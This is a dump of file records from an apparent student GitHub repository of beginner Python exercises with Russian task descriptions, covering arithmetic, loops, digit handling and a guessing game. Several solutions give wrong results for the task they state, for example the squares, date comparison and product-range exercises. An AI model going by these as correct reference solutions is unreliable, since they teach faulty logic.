"blob_id": "7c3dd60ca7500ba14efbccf585dc42fd70ff457d",
"content_id": "c74619a1bc7542da595f02aeec38e82adfe20601",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 4,
"path": "/Practic/Tasks/12.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите значение выражения ex−2+|sin(x)|−x10⋅cos1x при x=3.6\nimport math\nx = 3.6\nprint( (math.exp(x-2)) + (math.fabs(math.sin(x))) - (x**10 * math.cos(1/x)) )\n"
},
{
"alpha_fraction": 0.3956834673881531,
"alphanum_fraction": 0.528777003288269,
"avg_line_length": 20.384614944458008,
"blob_id": "6372e075afccc13e18d2fe929790c56104b6d3ea",
"content_id": "a4c7e1b14bf77f9b37528f18a1a31f552cd64d29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 337,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 13,
"path": "/Practic/Tasks/83.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите следующие строки. Первая: 25 25.5 24.8. Вторая: 26 26.5 25.8. И так далее. Последняя строка: 35 35.5 34.8.\n\n\ni = 10\nnum = 25.0\nwhile i >= 0:\n print('%d'%num, end=\" \")\n num += 0.5\n print(num, end=\" \")\n num -= 0.7\n print(num)\n num += 1.2\n i -= 1\n"
},
{
"alpha_fraction": 0.5632184147834778,
"alphanum_fraction": 0.6272578239440918,
"avg_line_length": 24.20833396911621,
"blob_id": "f586d94243489250cce314dc6c8562bebc330788",
"content_id": "b4420e16df4d8dbbb8b14dbbece3b9cde0b3010d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 922,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 24,
"path": "/Practic/Tasks/56.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Робот может перемещаться в четырех направлениях\n#(«11» — север, «12» — запад, «13» — юг, «14» — восток)\n# и принимать три цифровые команды: 0 — продолжать\n# движение, 1 — поворот налево, –1 — поворот направо.\n# Дан число (11, 12, 13 или 14) — исходное направление\n# робота и целое число N (0, 1 или -1) — посланная ему\n# команда. Вывести направление робота после выполнения\n# полученной команды (то есть север, запад, юг или восток).\n\nn = 11\nw = 12\ne = 13\ns = 14\n\nN = int(input(\"Input 0, 1 or -1 ,n=\"))\n\nif N == 0:\n print(n+1,w,e,s)\n\nif N == 1:\n print(n,w,e+1,s)\n\nif N == -1:\n print(n,w,e,s+1)\n\n\n\n\n"
},
{
"alpha_fraction": 0.5546875,
"alphanum_fraction": 0.6484375,
"avg_line_length": 24.600000381469727,
"blob_id": "2797777530b4f7be3a3e38e08f9add8ac25f3016",
"content_id": "160ef97f2877c936f286ce3c30033a58c07c46d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 185,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 5,
"path": "/Practic/Tasks/81.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран числа 100, 96, 92, ... до последнего положительного включительно.\ni= 104\nwhile i > 0:\n i -= 4\n print(i)\n"
},
{
"alpha_fraction": 0.5785714387893677,
"alphanum_fraction": 0.6928571462631226,
"avg_line_length": 16.5,
"blob_id": "088af8f9cdf288073cf36abfe95b1a42b5580906",
"content_id": "c435d215db9a022a4ebb6c453dcc43cc3b8dcaba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 8,
"path": "/Practic/Tasks/31.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дан прямоугольник размером 647 x 170.\n# Сколько квадратов со стороной 30 можно вырезать из него?\na = 647\nb = 170\n\nc = 30\n\nprint ((a+b)//c)\n"
},
{
"alpha_fraction": 0.6301369667053223,
"alphanum_fraction": 0.682191789150238,
"avg_line_length": 32.181819915771484,
"blob_id": "e6246b8b16f8a70252bca6b68b8a5022a3dee688",
"content_id": "f1b4d6fb1699687c858e5a0f4a5b1174f361e9b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 11,
"path": "/Practic/Tasks/19.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит цены 1 кг конфет и 1 кг печенья.\n# Найдите стоимость: а) одной покупки из 300 г конфет и 400 г печенья;\n# б) трех покупок, каждая из 2 кг печенья и 1 кг 800 г конфет.\n\nsandy = int(input(\"sandy:\"))\ncookies = int(input(\"cookies:\"))\n\nfirst_buy = sandy * 0.3 + cookies * 0.4\nsecond_buy = (2 * sandy + cookies) * 3\n\nprint(first_buy,'\\t',second_buy)\n"
},
{
"alpha_fraction": 0.6277372241020203,
"alphanum_fraction": 0.6423357725143433,
"avg_line_length": 26.200000762939453,
"blob_id": "d2b833cf8d9f6e4ddfffe804d0e639f3effa52b0",
"content_id": "9255fbff1d890ac17795a82f3b3dca9fd44f5b75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 205,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 5,
"path": "/Practic/Tasks/15.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит число. Выведите на экран квадрат этого числа, куб этого числа.\n\na = int(input(\"a=\"))\n\nprint( \" \", a**2,'\\n ',a**3)\n\n"
},
{
"alpha_fraction": 0.37142857909202576,
"alphanum_fraction": 0.6095238327980042,
"avg_line_length": 25.25,
"blob_id": "f7e872415c77806f40c7fe2bec4e43957df62e5f",
"content_id": "979a1b6c4ae3d81365ad491ef2728584e9b0a749",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 127,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 4,
"path": "/Practic/Tasks/80.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран ряд чисел 1001, 1004, 1007, ... 1025.\n\nfor i in range (1001, 1025, 3):\n print(i)\n"
},
{
"alpha_fraction": 0.5864979028701782,
"alphanum_fraction": 0.6033755540847778,
"avg_line_length": 20.545454025268555,
"blob_id": "f3cd5f4ed85d7aa6878842abe3d9471bf7acf943",
"content_id": "a26c3429a588322e24fe3a4be37b1aef895e6489",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 318,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 11,
"path": "/Practic/Tasks/21.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны катеты прямоугольного треугольника. Найдите площадь, периметр и гипотенузу треугольника.\nimport math\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\n\nc = math.sqrt(a**2 + b**2)\ns = 1/2 * (a*b)\np = a + b + c\n\nprint (s, \"\\t\", c, \"\\t\", p)\n"
},
{
"alpha_fraction": 0.4900990128517151,
"alphanum_fraction": 0.6089109182357788,
"avg_line_length": 20.105262756347656,
"blob_id": "45e9c18b006c04ffbea95ae1ed5dc04a5b81134a",
"content_id": "9b207320c24a7bdbe11f054ec4888ab6c8f27f77",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 487,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 19,
"path": "/Practic/Tasks/59.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано четырехзначное число.\n# Верно ли, что цифр в нем расположены по убыванию?\n# Например, 4311 - нет, 4321 - да, 5542 - нет,\n# 5631 - нет, 9871 - да.\n\nvalue = int(input(\"Value:\"))\n\ndigit_1 = value // 1000\ndigit_2 = value // 100 % 10\ndigit_3 = value // 10 % 10\ndigit_4 = value % 10\n\n\nif digit_2 == digit_1-1 and digit_3 == digit_2-1 and digit_4 == digit_3-1:\n\n print(\"Yes\")\n\nelse:\n print(\"No\")\n\n\n\n"
},
{
"alpha_fraction": 0.4580152630805969,
"alphanum_fraction": 0.572519063949585,
"avg_line_length": 13.44444465637207,
"blob_id": "3bec048d07366468b9e51c21a1475cae328e5543",
"content_id": "28e26919c232fe69f284f023a5448487346dfc5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 154,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 9,
"path": "/Practic/Tasks/87.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найти сумму 10+11+12+13+...+88. Материал сайта www.itmathrepetitor.ru\n\ni = 9\nn = 0\n\nwhile i < 88:\n i += 1\n n += i\nprint(n)\n\n"
},
{
"alpha_fraction": 0.43981480598449707,
"alphanum_fraction": 0.5787037014961243,
"avg_line_length": 34.83333206176758,
"blob_id": "7efd8409d09b3203dc7c79bf1b951dda9e9e6017",
"content_id": "b40fc0b0fbaa47881542aaf92b3896bd58ab4493",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 6,
"path": "/Practic/Tasks/11.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите значение выражения |x−5|−sinx3+x2+2014−−−−−−−−√cos2x−3 при x=−2.34. Ответ: -1.76911\nimport math\n\nx = -2.34\n\nprint( ( (math.fabs(x-5) - math.sin(x))/3 ) + ( math.sqrt(x**2 + 2014)) * math.cos(2 * x) - 3 )\n\n"
},
{
"alpha_fraction": 0.5281898975372314,
"alphanum_fraction": 0.5548961162567139,
"avg_line_length": 16.63157844543457,
"blob_id": "22ccfd04e6fd591ce9f0c48c98a968a1e69efb87",
"content_id": "5f54159af7aa809ed11a7a96100816e47216afa0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 423,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 19,
"path": "/Practic/Tasks/46.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит три числа. Найти сумму тех чисел, которые делятся на 5. Если таких чисел нет, то вывести error.\n\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\nsumm = 0\n\nif x % 5 == 0:\n summ += x\nif y % 5 == 0:\n summ += y\nif z % 5 == 0:\n summ += z\n\nif summ == 0:\n print(\"error\")\nelse:\n print(summ)\n\n\n"
},
{
"alpha_fraction": 0.554430365562439,
"alphanum_fraction": 0.5848101377487183,
"avg_line_length": 17.809524536132812,
"blob_id": "b3b4e02ab2bab56a07ee856b6e8362daa02837cd",
"content_id": "b4fe34701b51bd9ffac3e01e383f925f242f9fca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 21,
"path": "/Practic/Tasks/58.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано две даты, каждая из которых состоит из трех чисел\n# (день, месяц и год). Вывести yes,\n# если первая дата раньше второй, иначе вывести no.\n\nd = int(input(\"d:\"))\nm = int(input(\"m:\"))\ny = int(input(\"y:\"))\n\nd1 = int(input(\"d1:\"))\nm1 = int(input(\"m1:\"))\ny1 = int(input(\"y1:\"))\n\nif y > y1:\n print(d,m,y)\nelif m > m1:\n print(d,m,y)\nelif d > d1:\n print(d,m,y)\n\nelse:\n print(d1,m1,y1)\n"
},
{
"alpha_fraction": 0.6713286638259888,
"alphanum_fraction": 0.6853147149085999,
"avg_line_length": 9.214285850524902,
"blob_id": "216347831f4e4290027fd18c9f31fdd8b41e115d",
"content_id": "117314fe2bf0ffca4a1e6a184b0bb2e54d6c2509",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 14,
"path": "/Practic/Tasks/26.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны две переменных с некоторыми значениями.\n# Поменять местами значения этих переменных\n\na = 3\n\nb = 5\n\nbuff = a\n\na = b\n\nb = buff\n\nprint(a,b)\n"
},
{
"alpha_fraction": 0.5358090400695801,
"alphanum_fraction": 0.6259946823120117,
"avg_line_length": 25.928571701049805,
"blob_id": "1c388d94f28b118e5d72345860a2fce3b1c32a81",
"content_id": "802ae68fb187db90bb51e3e997791ee4c3dda0a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 524,
"license_type": "no_license",
"max_line_length": 220,
"num_lines": 14,
"path": "/Practic/Tasks/42.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано число. Если оно от 2 до 5 включительно, то увеличить его на 10. Если оно от 7 до 40, то уменьшить на 100. Если оно не более 0 или более 3000, то увеличить в 3 раза (то есть умножить на 3). Иначе занулить это число.\n\n\nx = int(input(\"x:\"))\n\nif 2 <= x <= 5:\n print(x+10)\nelif 7 < x < 40:\n print(x-100)\nelif x < 0 or x > 3000:\n print(x*3)\nelse:\n x=0\n print(x)\n"
},
{
"alpha_fraction": 0.625,
"alphanum_fraction": 0.7041666507720947,
"avg_line_length": 23,
"blob_id": "d748def0b948d47da24b9575ee5c03d29113315b",
"content_id": "df995d016e2b7a3e8c0702845cf89fdb6348e154",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 376,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 10,
"path": "/Practic/Tasks/32.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Из трехзначного числа x вычли его последнюю цифру.\n#Когда результат разделили на 10, # а к частному слева\n# приписали последнюю цифру числа x, то получилось число 237.\n#Найти число x.\n\nx = 237 // 100\nc = 237 % 100 * 10\ns = c + x\n\nprint(s)\n"
},
{
"alpha_fraction": 0.5988371968269348,
"alphanum_fraction": 0.6337209343910217,
"avg_line_length": 18.11111068725586,
"blob_id": "a6249bd6c831bf2752d3d5de070aeac2a70d9574",
"content_id": "92ec1d441d38949c04e206032abbad5329aed7b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 242,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 9,
"path": "/Practic/Tasks/20.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит время в минутах и расстояние в километрах. Найдите скорость в м/c.\nt = int(input(\"t:\"))\ns = int(input(\"s:\"))\n\nt = t / 60\n\ns = s /1000\n\nprint(\"V:\",s/t)\n"
},
{
"alpha_fraction": 0.5882353186607361,
"alphanum_fraction": 0.6911764740943909,
"avg_line_length": 21.66666603088379,
"blob_id": "3b02b7f036933d47fdd295a33bbfecf69b2afe98",
"content_id": "b1bfc6a60c7ee02b5b4ae3d121b45b232ca021ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 527,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 18,
"path": "/Practic/Tasks/66.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны два трехзначных числа.\n# Получите новое число присоединением\n# второго числа справа к первому без последних\n# цифр у каждого. Например, 123 и 456 Ответ: 1245\n\n\nvalue = int(input(\"Value:\"))\nvalue1 = int(input(\"Value:\"))\n\ndigit_1 = value // 100\ndigit_2 = value // 10 % 10\ndigit_3 = value % 10\n\ndigit1 = value1 // 100\ndigit2 = value1 // 10 % 10\ndigit3 = value1 % 10\n\nprint(digit_1,digit_2,digit1,digit2)\n"
},
{
"alpha_fraction": 0.3426573574542999,
"alphanum_fraction": 0.3916083872318268,
"avg_line_length": 14.666666984558105,
"blob_id": "0dffb4335242af9fde0e80f12a7f6970e3c64fe9",
"content_id": "2d5494b191644e97c0892cfb7ab74f273bf8e2fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 9,
"path": "/Practic/codeforces/A. Театральная площадь.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "n, m, a = map(int, input().split(' '))\ni = 0\ns2 = 0\nwhile n * m != s2:\n s2 += a + a\n if n * m <= s2:\n break\n i += 1\nprint(i)\n\n\n"
},
{
"alpha_fraction": 0.6405693888664246,
"alphanum_fraction": 0.6548042893409729,
"avg_line_length": 24.545454025268555,
"blob_id": "32455a0306394968fbcf0812af1a79cfec9f9632",
"content_id": "a836dbc72932c679654dd76a115ff2c868509f25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 11,
"path": "/Practic/Tasks/16.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Пользователь вводит три числа. Увеличьте первое число в два раза, второе числа уменьшите на 3, третье число возведите в квадрат и затем найдите сумму новых трех чисел.\n\na = int(input(\"a:\"))\nb = int(input(\"b:\"))\nc = int(input(\"c:\"))\n\na = a * 2\nb = b - 3\nd = c**2\n\nprint(a + b + c)\n"
},
{
"alpha_fraction": 0.4325396716594696,
"alphanum_fraction": 0.511904776096344,
"avg_line_length": 24.200000762939453,
"blob_id": "8ca1b02b11a28766b81af6bc01fd1dafb7bc979e",
"content_id": "56d1ff9b2bff9167cd6612d8d8f10f2695cf12e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 10,
"path": "/Practic/Tasks/105.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найдите хотя одно натуральное число, которое делится на 11, а при делении на 2, 3, 4, ..., 10 дает в остатке 1\n\ni = 0\nj = 0\n\nfor i in range(1, 20):\n if i % 11 == 0:\n for j in range (2,10):\n if i % j == 1:\n print(i)\n"
},
{
"alpha_fraction": 0.43529412150382996,
"alphanum_fraction": 0.5411764979362488,
"avg_line_length": 11.142857551574707,
"blob_id": "e43be5874591557c3b2c97aeb8ef3aa1ac467666",
"content_id": "0d59bf5c6bb6e9ddbd50f86c904f5f79b0ff21f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 110,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 7,
"path": "/Practic/Tasks/88.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найти произведение 5⋅6⋅7⋅...⋅13.\n\nn = 1\n\nfor i in range(5, 13):\n n *= i\nprint(n)\n"
},
{
"alpha_fraction": 0.5824176073074341,
"alphanum_fraction": 0.6007326245307922,
"avg_line_length": 21.75,
"blob_id": "831b7f2ee30d1c3a6502c01d36fe3a4b4121b32a",
"content_id": "cfe791a5eb8f6ebd9bd79d44d10e6f317c897de5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 12,
"path": "/Games/guess the number.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "import random\nrezult = random.randint(1,100)\nnumber = 0\n\nwhile number != rezult:\n number = int(input(\"Number:\"))\n if number > rezult:\n print(\"Input less\")\n elif number < rezult:\n print(\"Input more\")\n elif number == rezult:\n print(\"Winnnn\")\n"
},
{
"alpha_fraction": 0.3614457845687866,
"alphanum_fraction": 0.5180723071098328,
"avg_line_length": 15.600000381469727,
"blob_id": "327b93b56e4588678ff63085e491fe6d2795b031",
"content_id": "e6d545200443fb7a258bfc0eb47172948ea55eda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 5,
"path": "/Practic/Tasks/89.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найти сумму 1+4+7+11+...+112.\nn = 0\nfor i in range (1, 112):\n n += i\nprint(n)\n"
},
{
"alpha_fraction": 0.37362638115882874,
"alphanum_fraction": 0.5128205418586731,
"avg_line_length": 26.299999237060547,
"blob_id": "33f3074858cf24f32fbd7cc013a8cb2410e9a3d6",
"content_id": "ce3b32406dfc3f9fe79168f29385bc6802f83b09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 340,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 10,
"path": "/Practic/Tasks/104.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Сколько существует четырехзначных чисел, которые в 600 раз больше суммы своих цифр?\nj = 0\nfor i in range (1000, 9999):\n d_1 = i // 1000\n d_2 = i // 100 % 10\n d_3 = i // 10 % 10\n d_4 = i % 10\n j = (d_1 + d_2 + d_3 + d_4) * 600\n if i > j:\n print(i)\n"
},
{
"alpha_fraction": 0.46706587076187134,
"alphanum_fraction": 0.56886225938797,
"avg_line_length": 19.875,
"blob_id": "1f091c7291d418f8c9e79b54c8fb52efbf42dd04",
"content_id": "e93ea3b7a3ad6d33ea20f2001c9db1f6d673c794",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 177,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 8,
"path": "/Practic/Tasks/91.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Найти сумму 2/3+3/4+4/5+...+9/10.\nfrom fractions import Fraction\ni = Fraction(2, 3)\ng = 0\nwhile i <= Fraction(9, 10):\n i += Fraction(1, 1)\n g += i\n print(g)\n"
},
{
"alpha_fraction": 0.4457831382751465,
"alphanum_fraction": 0.5542168617248535,
"avg_line_length": 19.75,
"blob_id": "5e25149f26bbd4f894b94bf67fee717110d90f61",
"content_id": "316fbb136d9d2cc096ded32e229cf68699d07b1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 4,
"path": "/Practic/Tasks/79.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран числа 1, 2, 3, 4, ..., 20.\n\nfor i in range (1,21):\n print(i)\n"
},
{
"alpha_fraction": 0.5568181872367859,
"alphanum_fraction": 0.5909090638160706,
"avg_line_length": 18.55555534362793,
"blob_id": "432956a4215993c31c74b8ffd57cd33a74969c6b",
"content_id": "119825df720bb470a39d64e46e9edc5bbbc5023e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 226,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 9,
"path": "/Practic/Tasks/38.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано два числа. Вывести yes, если они отличаются на 100, иначе вывести No.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\n\nif x - 100 == y:\n print(\"Yes\")\nelse:\n print(\"No\")\n"
},
{
"alpha_fraction": 0.3354037404060364,
"alphanum_fraction": 0.3602484464645386,
"avg_line_length": 11.307692527770996,
"blob_id": "484877141af8eb0174d36f228db85fdeeedff3a1",
"content_id": "b7ccb934a7b9018f2e047dfb08f6f97bafc00d1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 186,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 13,
"path": "/Practic/Tasks/109.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Выведите на экран строки вида:\n#*******\n#****\n#*******\n#****\n#*******\n#****\nn = int(input(\"n:\"))\ni=0\nwhile i < n:\n i += 1\n print(\"*\"*7)\n print(\"*\"*4)\n\n"
},
{
"alpha_fraction": 0.517699122428894,
"alphanum_fraction": 0.5486725568771362,
"avg_line_length": 12.29411792755127,
"blob_id": "a7c0c9d5fb13245f68d88302a5f4e66849e43696",
"content_id": "9c336f5707a0da12ed4e7897f221e9cd650a7099",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 279,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 17,
"path": "/Practic/Tasks/55.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано три числа.\n#Найти количество положительных чисел среди них.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\nz = int(input(\"z:\"))\n\nsumm = 0\n\nif x > 0:\n summ += 1\nif y > 0:\n summ += 1\nif z > 0:\n summ += 1\n\nprint(summ)\n"
},
{
"alpha_fraction": 0.3352601230144501,
"alphanum_fraction": 0.47398844361305237,
"avg_line_length": 33.599998474121094,
"blob_id": "a1b170dde0d9f9d983bf535e2b7ac2f64a616807",
"content_id": "f98c2eda24986d177b6006657ff12e0a068e08f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 5,
"path": "/Practic/Tasks/10.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вычислите значение выражения (x+1)**2+3*(x+1) при а) x=1.7; б) x=3. Ответ: а) 15.39 б) 28\nx = 1.7\nprint((x + 1) ** 2 + 3 * (x + 1))\nx = 3\nprint((x + 1) ** 2 + 3 * (x + 1))\n"
},
{
"alpha_fraction": 0.5931559205055237,
"alphanum_fraction": 0.6730037927627563,
"avg_line_length": 15.4375,
"blob_id": "cdb13932190ebc609f379fc499568de1165f5e74",
"content_id": "44246faf4beec70b3d4c32e276d170608e530a56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 315,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 16,
"path": "/Practic/Tasks/60.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано трехзначное число.\n# Переставьте первую и последнюю цифры.\n\nvalue = int(input(\"value:\"))\n\ndigit_1 = value // 100\ndigit_2 = value // 10 % 10\ndigit_3 = value % 10\n\nbuff = digit_1\nbuff1 = digit_3\n\ndigit_1 = buff1\ndigit_3 = buff\n\nprint(digit_1,digit_2,digit_3)\n"
},
{
"alpha_fraction": 0.5883978009223938,
"alphanum_fraction": 0.6132596731185913,
"avg_line_length": 16,
"blob_id": "dcad715cc200fd95afb2046f0259aa3107411278",
"content_id": "509701aafb71364fb0119c19b2c4ae9a8c1b819d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 527,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 21,
"path": "/Practic/Tasks/27.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Даны три переменные a, b и c.\n# Изменить значения этих переменных так,\n# чтобы в a хранилось значение a+b,\n# в b хранилась разность старых значений c−a,\n# а в c хранилось сумма старых значений a+b+c.\n# Например,a=0, b=2, c=5, тогда новые значения a=2, b=3 и c=7.\n\na = 0\nb = 2\nc = 5\n\nth = a + b + c\no = a + b\ntw = c - a\n\n\na = o\nb = tw\nc = th\n\nprint(a, b,c)\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5519125461578369,
"alphanum_fraction": 0.5846994519233704,
"avg_line_length": 19.33333396911621,
"blob_id": "0bd8fdf90f8e0d09aa6a8db025e752adf8f78053",
"content_id": "76ad9a2c3380707d94a9f60e4f8c896859ed39d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 234,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 9,
"path": "/Practic/Tasks/53.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Дано два числа. Если хотя бы одно из них больше 30, то вывести yes, иначе no.\n\nx = int(input(\"x:\"))\ny = int(input(\"y:\"))\n\nif x > 30 or y > 30:\n print(\"Yes\")\nelse:\n print(\"No\")\n"
},
{
"alpha_fraction": 0.43971630930900574,
"alphanum_fraction": 0.5650117993354797,
"avg_line_length": 34.25,
"blob_id": "9ec138a64f621251bb819a85eb884e2d83adf440",
"content_id": "1e3c878b51f8c154d5c376ac1f10614b774a7790",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 476,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 12,
"path": "/Practic/Tasks/100.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
"text": "#Вывести на экран числа от 1000 до 9999 такие, что среди цифр нет цифр 5 и цифры 6.\n\nvalue = 999\nwhile value < 9999:\n value += 1\n digit_1 = value // 1000\n digit_2 = value // 100 % 10\n digit_3 = value // 10 % 10\n digit_4 = value % 10\n if digit_1 != 5 and digit_1 != 6 and digit_2 != 5 and digit_2 != 6 and digit_3 != 5 and digit_3 != 6 \\\n and digit_4 != 5 and digit_4 != 6:\n print(value)\n"
},
{
"alpha_fraction": 0.34545454382896423,
"alphanum_fraction": 0.47792208194732666,
"avg_line_length": 31.08333396911621,
"blob_id": "2245e9ea8da3d646c26b1297c684233b4323b401",
"content_id": "a8d2a61c50fb75106e56304f4144543d8827c3f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 478,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 12,
"path": "/Practic/Tasks/101.py",
"repo_name": "Yevgen32/Python",
"src_encoding": "UTF-8",
